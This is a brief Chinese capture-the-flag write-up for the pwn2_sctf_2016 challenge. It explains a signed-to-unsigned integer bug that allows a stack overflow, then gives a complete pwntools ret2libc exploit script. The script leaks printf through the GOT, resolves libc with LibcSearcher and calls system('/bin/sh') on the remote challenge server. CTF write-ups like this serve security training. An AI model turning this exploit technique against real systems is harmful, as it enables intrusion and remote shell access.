题目截图
例行检查
有符号转无符号造成漏洞,输入-1就能绕过if,转换成无符号数又会造成栈溢出
利用printf函数泄露libc,常规流程
exp
from pwn import*
from LibcSearcher import *
elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')
p=remote('node4.buuoj.cn',27385)
printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=0x80485b8
p.sendlineafter(b'read? ',b'-1')
payload=b'a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter(b'data!\n',payload)
p.recvuntil(b'\n')
addr=u32(p.recv(4))
libc=LibcSearcher('printf',addr)
libcbase=addr-libc.dump('printf')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
p.sendlineafter(b'read? ',b'-1')
payload=b'a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter(b'data!\n',payload)
p.interactive()